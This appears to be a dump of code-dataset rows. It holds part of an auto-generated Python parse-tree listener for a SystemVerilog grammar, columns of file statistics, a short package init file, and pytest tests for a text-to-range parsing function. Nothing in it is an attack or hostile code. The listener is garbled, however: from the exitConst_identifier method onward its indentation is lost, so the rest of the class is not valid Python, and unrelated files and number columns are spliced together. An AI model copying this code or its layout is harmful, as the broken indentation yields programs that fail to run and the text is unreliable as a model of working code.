        pass

    # Exit a parse tree produced by SystemVerilogParser#string_literal.
    def exitString_literal(self, ctx:SystemVerilogParser.String_literalContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#attribute_instance.
    def enterAttribute_instance(self, ctx:SystemVerilogParser.Attribute_instanceContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#attribute_instance.
    def exitAttribute_instance(self, ctx:SystemVerilogParser.Attribute_instanceContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#attr_spec.
    def enterAttr_spec(self, ctx:SystemVerilogParser.Attr_specContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#attr_spec.
    def exitAttr_spec(self, ctx:SystemVerilogParser.Attr_specContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#attr_name.
    def enterAttr_name(self, ctx:SystemVerilogParser.Attr_nameContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#attr_name.
    def exitAttr_name(self, ctx:SystemVerilogParser.Attr_nameContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#array_identifier.
    def enterArray_identifier(self, ctx:SystemVerilogParser.Array_identifierContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#array_identifier.
    def exitArray_identifier(self, ctx:SystemVerilogParser.Array_identifierContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#block_identifier.
    def enterBlock_identifier(self, ctx:SystemVerilogParser.Block_identifierContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#block_identifier.
    def exitBlock_identifier(self, ctx:SystemVerilogParser.Block_identifierContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#bin_identifier.
    def enterBin_identifier(self, ctx:SystemVerilogParser.Bin_identifierContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#bin_identifier.
    def exitBin_identifier(self, ctx:SystemVerilogParser.Bin_identifierContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#c_identifier.
    def enterC_identifier(self, ctx:SystemVerilogParser.C_identifierContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#c_identifier.
    def exitC_identifier(self, ctx:SystemVerilogParser.C_identifierContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#cell_identifier.
    def enterCell_identifier(self, ctx:SystemVerilogParser.Cell_identifierContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#cell_identifier.
    def exitCell_identifier(self, ctx:SystemVerilogParser.Cell_identifierContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#checker_identifier.
    def enterChecker_identifier(self, ctx:SystemVerilogParser.Checker_identifierContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#checker_identifier.
    def exitChecker_identifier(self, ctx:SystemVerilogParser.Checker_identifierContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#class_identifier.
    def enterClass_identifier(self, ctx:SystemVerilogParser.Class_identifierContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#class_identifier.
    def exitClass_identifier(self, ctx:SystemVerilogParser.Class_identifierContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#class_variable_identifier.
    def enterClass_variable_identifier(self, ctx:SystemVerilogParser.Class_variable_identifierContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#class_variable_identifier.
    def exitClass_variable_identifier(self, ctx:SystemVerilogParser.Class_variable_identifierContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#clocking_identifier.
    def enterClocking_identifier(self, ctx:SystemVerilogParser.Clocking_identifierContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#clocking_identifier.
    def exitClocking_identifier(self, ctx:SystemVerilogParser.Clocking_identifierContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#config_identifier.
    def enterConfig_identifier(self, ctx:SystemVerilogParser.Config_identifierContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#config_identifier.
    def exitConfig_identifier(self, ctx:SystemVerilogParser.Config_identifierContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#const_identifier.
    def enterConst_identifier(self, ctx:SystemVerilogParser.Const_identifierContext) -> None:
        pass
# Exit a parse tree produced by SystemVerilogParser#const_identifier.
def exitConst_identifier(self, ctx:SystemVerilogParser.Const_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constraint_identifier.
def enterConstraint_identifier(self, ctx:SystemVerilogParser.Constraint_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constraint_identifier.
def exitConstraint_identifier(self, ctx:SystemVerilogParser.Constraint_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#covergroup_identifier.
def enterCovergroup_identifier(self, ctx:SystemVerilogParser.Covergroup_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#covergroup_identifier.
def exitCovergroup_identifier(self, ctx:SystemVerilogParser.Covergroup_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#covergroup_variable_identifier.
def enterCovergroup_variable_identifier(self, ctx:SystemVerilogParser.Covergroup_variable_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#covergroup_variable_identifier.
def exitCovergroup_variable_identifier(self, ctx:SystemVerilogParser.Covergroup_variable_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#cover_point_identifier.
def enterCover_point_identifier(self, ctx:SystemVerilogParser.Cover_point_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#cover_point_identifier.
def exitCover_point_identifier(self, ctx:SystemVerilogParser.Cover_point_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#cross_identifier.
def enterCross_identifier(self, ctx:SystemVerilogParser.Cross_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#cross_identifier.
def exitCross_identifier(self, ctx:SystemVerilogParser.Cross_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#dynamic_array_variable_identifier.
def enterDynamic_array_variable_identifier(self, ctx:SystemVerilogParser.Dynamic_array_variable_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#dynamic_array_variable_identifier.
def exitDynamic_array_variable_identifier(self, ctx:SystemVerilogParser.Dynamic_array_variable_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#enum_identifier.
def enterEnum_identifier(self, ctx:SystemVerilogParser.Enum_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#enum_identifier.
def exitEnum_identifier(self, ctx:SystemVerilogParser.Enum_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#formal_identifier.
def enterFormal_identifier(self, ctx:SystemVerilogParser.Formal_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#formal_identifier.
def exitFormal_identifier(self, ctx:SystemVerilogParser.Formal_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#formal_port_identifier.
def enterFormal_port_identifier(self, ctx:SystemVerilogParser.Formal_port_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#formal_port_identifier.
def exitFormal_port_identifier(self, ctx:SystemVerilogParser.Formal_port_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#function_identifier.
def enterFunction_identifier(self, ctx:SystemVerilogParser.Function_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#function_identifier.
def exitFunction_identifier(self, ctx:SystemVerilogParser.Function_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#generate_block_identifier.
def enterGenerate_block_identifier(self, ctx:SystemVerilogParser.Generate_block_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#generate_block_identifier.
def exitGenerate_block_identifier(self, ctx:SystemVerilogParser.Generate_block_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#genvar_identifier.
def enterGenvar_identifier(self, ctx:SystemVerilogParser.Genvar_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#genvar_identifier.
def exitGenvar_identifier(self, ctx:SystemVerilogParser.Genvar_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_array_identifier.
def enterHierarchical_array_identifier(self, ctx:SystemVerilogParser.Hierarchical_array_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_array_identifier.
def exitHierarchical_array_identifier(self, ctx:SystemVerilogParser.Hierarchical_array_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_block_identifier.
def enterHierarchical_block_identifier(self, ctx:SystemVerilogParser.Hierarchical_block_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_block_identifier.
def exitHierarchical_block_identifier(self, ctx:SystemVerilogParser.Hierarchical_block_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_event_identifier.
def enterHierarchical_event_identifier(self, ctx:SystemVerilogParser.Hierarchical_event_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_event_identifier.
def exitHierarchical_event_identifier(self, ctx:SystemVerilogParser.Hierarchical_event_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_identifier.
def enterHierarchical_identifier(self, ctx:SystemVerilogParser.Hierarchical_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_identifier.
def exitHierarchical_identifier(self, ctx:SystemVerilogParser.Hierarchical_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_net_identifier.
def enterHierarchical_net_identifier(self, ctx:SystemVerilogParser.Hierarchical_net_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_net_identifier.
def exitHierarchical_net_identifier(self, ctx:SystemVerilogParser.Hierarchical_net_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_parameter_identifier.
def enterHierarchical_parameter_identifier(self, ctx:SystemVerilogParser.Hierarchical_parameter_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_parameter_identifier.
def exitHierarchical_parameter_identifier(self, ctx:SystemVerilogParser.Hierarchical_parameter_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_property_identifier.
def enterHierarchical_property_identifier(self, ctx:SystemVerilogParser.Hierarchical_property_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_property_identifier.
def exitHierarchical_property_identifier(self, ctx:SystemVerilogParser.Hierarchical_property_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_sequence_identifier.
def enterHierarchical_sequence_identifier(self, ctx:SystemVerilogParser.Hierarchical_sequence_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_sequence_identifier.
def exitHierarchical_sequence_identifier(self, ctx:SystemVerilogParser.Hierarchical_sequence_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_task_identifier.
def enterHierarchical_task_identifier(self, ctx:SystemVerilogParser.Hierarchical_task_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_task_identifier.
def exitHierarchical_task_identifier(self, ctx:SystemVerilogParser.Hierarchical_task_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_tf_identifier.
def enterHierarchical_tf_identifier(self, ctx:SystemVerilogParser.Hierarchical_tf_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_tf_identifier.
def exitHierarchical_tf_identifier(self, ctx:SystemVerilogParser.Hierarchical_tf_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_variable_identifier.
def enterHierarchical_variable_identifier(self, ctx:SystemVerilogParser.Hierarchical_variable_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_variable_identifier.
def exitHierarchical_variable_identifier(self, ctx:SystemVerilogParser.Hierarchical_variable_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#identifier.
def enterIdentifier(self, ctx:SystemVerilogParser.IdentifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#identifier.
def exitIdentifier(self, ctx:SystemVerilogParser.IdentifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#index_variable_identifier.
def enterIndex_variable_identifier(self, ctx:SystemVerilogParser.Index_variable_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#index_variable_identifier.
def exitIndex_variable_identifier(self, ctx:SystemVerilogParser.Index_variable_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_identifier.
def enterInterface_identifier(self, ctx:SystemVerilogParser.Interface_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_identifier.
def exitInterface_identifier(self, ctx:SystemVerilogParser.Interface_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_instance_identifier.
def enterInterface_instance_identifier(self, ctx:SystemVerilogParser.Interface_instance_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_instance_identifier.
def exitInterface_instance_identifier(self, ctx:SystemVerilogParser.Interface_instance_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#inout_port_identifier.
def enterInout_port_identifier(self, ctx:SystemVerilogParser.Inout_port_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#inout_port_identifier.
def exitInout_port_identifier(self, ctx:SystemVerilogParser.Inout_port_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#input_port_identifier.
def enterInput_port_identifier(self, ctx:SystemVerilogParser.Input_port_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#input_port_identifier.
def exitInput_port_identifier(self, ctx:SystemVerilogParser.Input_port_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#instance_identifier.
def enterInstance_identifier(self, ctx:SystemVerilogParser.Instance_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#instance_identifier.
def exitInstance_identifier(self, ctx:SystemVerilogParser.Instance_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#library_identifier.
def enterLibrary_identifier(self, ctx:SystemVerilogParser.Library_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#library_identifier.
def exitLibrary_identifier(self, ctx:SystemVerilogParser.Library_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#member_identifier.
def enterMember_identifier(self, ctx:SystemVerilogParser.Member_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#member_identifier.
def exitMember_identifier(self, ctx:SystemVerilogParser.Member_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#method_identifier.
def enterMethod_identifier(self, ctx:SystemVerilogParser.Method_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#method_identifier.
def exitMethod_identifier(self, ctx:SystemVerilogParser.Method_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#modport_identifier.
def enterModport_identifier(self, ctx:SystemVerilogParser.Modport_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#modport_identifier.
def exitModport_identifier(self, ctx:SystemVerilogParser.Modport_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_identifier.
def enterModule_identifier(self, ctx:SystemVerilogParser.Module_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_identifier.
def exitModule_identifier(self, ctx:SystemVerilogParser.Module_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#net_identifier.
def enterNet_identifier(self, ctx:SystemVerilogParser.Net_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#net_identifier.
def exitNet_identifier(self, ctx:SystemVerilogParser.Net_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#net_type_identifier.
def enterNet_type_identifier(self, ctx:SystemVerilogParser.Net_type_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#net_type_identifier.
def exitNet_type_identifier(self, ctx:SystemVerilogParser.Net_type_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#output_port_identifier.
def enterOutput_port_identifier(self, ctx:SystemVerilogParser.Output_port_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#output_port_identifier.
def exitOutput_port_identifier(self, ctx:SystemVerilogParser.Output_port_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#package_identifier.
def enterPackage_identifier(self, ctx:SystemVerilogParser.Package_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#package_identifier.
def exitPackage_identifier(self, ctx:SystemVerilogParser.Package_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#package_scope.
def enterPackage_scope(self, ctx:SystemVerilogParser.Package_scopeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#package_scope.
def exitPackage_scope(self, ctx:SystemVerilogParser.Package_scopeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#parameter_identifier.
def enterParameter_identifier(self, ctx:SystemVerilogParser.Parameter_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#parameter_identifier.
def exitParameter_identifier(self, ctx:SystemVerilogParser.Parameter_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#port_identifier.
def enterPort_identifier(self, ctx:SystemVerilogParser.Port_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#port_identifier.
def exitPort_identifier(self, ctx:SystemVerilogParser.Port_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#production_identifier.
def enterProduction_identifier(self, ctx:SystemVerilogParser.Production_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#production_identifier.
def exitProduction_identifier(self, ctx:SystemVerilogParser.Production_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#program_identifier.
def enterProgram_identifier(self, ctx:SystemVerilogParser.Program_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#program_identifier.
def exitProgram_identifier(self, ctx:SystemVerilogParser.Program_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#property_identifier.
def enterProperty_identifier(self, ctx:SystemVerilogParser.Property_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#property_identifier.
def exitProperty_identifier(self, ctx:SystemVerilogParser.Property_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_class_identifier.
def enterPs_class_identifier(self, ctx:SystemVerilogParser.Ps_class_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_class_identifier.
def exitPs_class_identifier(self, ctx:SystemVerilogParser.Ps_class_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_covergroup_identifier.
def enterPs_covergroup_identifier(self, ctx:SystemVerilogParser.Ps_covergroup_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_covergroup_identifier.
def exitPs_covergroup_identifier(self, ctx:SystemVerilogParser.Ps_covergroup_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_checker_identifier.
def enterPs_checker_identifier(self, ctx:SystemVerilogParser.Ps_checker_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_checker_identifier.
def exitPs_checker_identifier(self, ctx:SystemVerilogParser.Ps_checker_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_identifier.
def enterPs_identifier(self, ctx:SystemVerilogParser.Ps_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_identifier.
def exitPs_identifier(self, ctx:SystemVerilogParser.Ps_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_or_hierarchical_array_identifier.
def enterPs_or_hierarchical_array_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_array_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_or_hierarchical_array_identifier.
def exitPs_or_hierarchical_array_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_array_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_or_hierarchical_net_identifier.
def enterPs_or_hierarchical_net_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_net_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_or_hierarchical_net_identifier.
def exitPs_or_hierarchical_net_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_net_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_or_hierarchical_property_identifier.
def enterPs_or_hierarchical_property_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_property_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_or_hierarchical_property_identifier.
def exitPs_or_hierarchical_property_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_property_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_or_hierarchical_sequence_identifier.
def enterPs_or_hierarchical_sequence_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_sequence_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_or_hierarchical_sequence_identifier.
def exitPs_or_hierarchical_sequence_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_sequence_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_or_hierarchical_tf_identifier.
def enterPs_or_hierarchical_tf_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_tf_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_or_hierarchical_tf_identifier.
def exitPs_or_hierarchical_tf_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_tf_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_parameter_identifier.
def enterPs_parameter_identifier(self, ctx:SystemVerilogParser.Ps_parameter_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_parameter_identifier.
def exitPs_parameter_identifier(self, ctx:SystemVerilogParser.Ps_parameter_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_type_identifier.
def enterPs_type_identifier(self, ctx:SystemVerilogParser.Ps_type_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_type_identifier.
def exitPs_type_identifier(self, ctx:SystemVerilogParser.Ps_type_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#sequence_identifier.
def enterSequence_identifier(self, ctx:SystemVerilogParser.Sequence_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#sequence_identifier.
def exitSequence_identifier(self, ctx:SystemVerilogParser.Sequence_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#signal_identifier.
def enterSignal_identifier(self, ctx:SystemVerilogParser.Signal_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#signal_identifier.
def exitSignal_identifier(self, ctx:SystemVerilogParser.Signal_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#simple_identifier.
def enterSimple_identifier(self, ctx:SystemVerilogParser.Simple_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#simple_identifier.
def exitSimple_identifier(self, ctx:SystemVerilogParser.Simple_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#specparam_identifier.
def enterSpecparam_identifier(self, ctx:SystemVerilogParser.Specparam_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#specparam_identifier.
def exitSpecparam_identifier(self, ctx:SystemVerilogParser.Specparam_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#task_identifier.
def enterTask_identifier(self, ctx:SystemVerilogParser.Task_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#task_identifier.
def exitTask_identifier(self, ctx:SystemVerilogParser.Task_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#tf_identifier.
def enterTf_identifier(self, ctx:SystemVerilogParser.Tf_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#tf_identifier.
def exitTf_identifier(self, ctx:SystemVerilogParser.Tf_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#terminal_identifier.
def enterTerminal_identifier(self, ctx:SystemVerilogParser.Terminal_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#terminal_identifier.
def exitTerminal_identifier(self, ctx:SystemVerilogParser.Terminal_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#topmodule_identifier.
def enterTopmodule_identifier(self, ctx:SystemVerilogParser.Topmodule_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#topmodule_identifier.
def exitTopmodule_identifier(self, ctx:SystemVerilogParser.Topmodule_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#type_identifier.
def enterType_identifier(self, ctx:SystemVerilogParser.Type_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#type_identifier.
def exitType_identifier(self, ctx:SystemVerilogParser.Type_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#udp_identifier.
def enterUdp_identifier(self, ctx:SystemVerilogParser.Udp_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#udp_identifier.
def exitUdp_identifier(self, ctx:SystemVerilogParser.Udp_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#variable_identifier.
def enterVariable_identifier(self, ctx:SystemVerilogParser.Variable_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#variable_identifier.
def exitVariable_identifier(self, ctx:SystemVerilogParser.Variable_identifierContext):
pass
del SystemVerilogParser
| 41.735889
| 141
| 0.771122
| 29,212
| 274,330
| 6.991921
| 0.037861
| 0.04286
| 0.071433
| 0.128579
| 0.924792
| 0.915598
| 0.915598
| 0.783606
| 0.777927
| 0.469552
| 0
| 0.000445
| 0.18095
| 274,330
| 6,573
| 142
| 41.735889
| 0.908576
| 0.375183
| 0
| 0.498803
| 1
| 0
| 0.000006
| 0
| 0
| 0
| 0
| 0
| 0.008895
| 1
| 0.498803
| false
| 0.50154
| 0.005132
| 0
| 0.504276
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
6b0188e17e264d12c71fc510e34506fdab4211db
| 130
|
py
|
Python
|
src/deidentify_data/__init__.py
|
ksaustin88/deidentify_data
|
24a0aa252c7f135185109044437595927a616104
|
[
"MIT"
] | null | null | null |
src/deidentify_data/__init__.py
|
ksaustin88/deidentify_data
|
24a0aa252c7f135185109044437595927a616104
|
[
"MIT"
] | null | null | null |
src/deidentify_data/__init__.py
|
ksaustin88/deidentify_data
|
24a0aa252c7f135185109044437595927a616104
|
[
"MIT"
] | null | null | null |
import src.deidentify_data.core
import src.deidentify_data.utilities
import src.deidentify_data.io
from src import deidentify_data
| 32.5
| 36
| 0.884615
| 20
| 130
| 5.55
| 0.4
| 0.504505
| 0.513514
| 0.621622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069231
| 130
| 4
| 37
| 32.5
| 0.917355
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
6b14fad20ef7c6a476b2deb21e15c838d3a26517
| 1,375
|
py
|
Python
|
tests/parsing/test_range_from_text.py
|
sixty-north/les_iterables
|
755cdde4dd9e3d56ce2f424ff0619bde7064e897
|
[
"MIT"
] | 2
|
2020-07-04T22:21:10.000Z
|
2021-12-10T14:38:18.000Z
|
tests/parsing/test_range_from_text.py
|
sixty-north/les_iterables
|
755cdde4dd9e3d56ce2f424ff0619bde7064e897
|
[
"MIT"
] | 1
|
2020-05-26T12:01:50.000Z
|
2020-05-26T12:01:50.000Z
|
tests/parsing/test_range_from_text.py
|
sixty-north/les_iterables
|
755cdde4dd9e3d56ce2f424ff0619bde7064e897
|
[
"MIT"
] | null | null | null |
from pytest import raises
from les_iterables.parsing import range_from_text
def test_range_from_text_empty():
with raises(ValueError):
range_from_text("")
def test_range_from_text_non_numeric():
with raises(ValueError):
range_from_text("NOT A NUMBER")
def test_range_from_text_single_number():
assert range_from_text("5") == range(5, 6)
def test_range_from_text_single_element_range():
assert range_from_text("5-5") == range(5, 6)
def test_range_from_text_two_element_range():
assert range_from_text("5-6") == range(5, 7)
def test_range_from_text_ten_element_range():
assert range_from_text("5-15") == range(5, 16)
def test_range_from_text_ten_element_range_space_before():
assert range_from_text(" 5-15") == range(5, 16)
def test_range_from_text_ten_element_range_space_after():
assert range_from_text("5-15 ") == range(5, 16)
def test_range_from_text_ten_element_range_space_between():
assert range_from_text("5 - 15") == range(5, 16)
def test_range_from_text_two_element_range_non_default_separator():
assert range_from_text("5—-6", separator="—-") == range(5, 7)
def test_range_from_negative_raises_value_error():
with raises(ValueError):
range_from_text("-5 - 15")
def test_descending_range_raises_value_error():
with raises(ValueError):
range_from_text("10-5")
| 24.553571
| 67
| 0.741818
| 217
| 1,375
| 4.235023
| 0.18894
| 0.235038
| 0.325354
| 0.191513
| 0.820457
| 0.774755
| 0.682263
| 0.593036
| 0.45049
| 0.282916
| 0
| 0.03833
| 0.146182
| 1,375
| 55
| 68
| 25
| 0.74276
| 0
| 0
| 0.266667
| 0
| 0
| 0.042909
| 0
| 0
| 0
| 0
| 0
| 0.266667
| 1
| 0.4
| true
| 0
| 0.066667
| 0
| 0.466667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
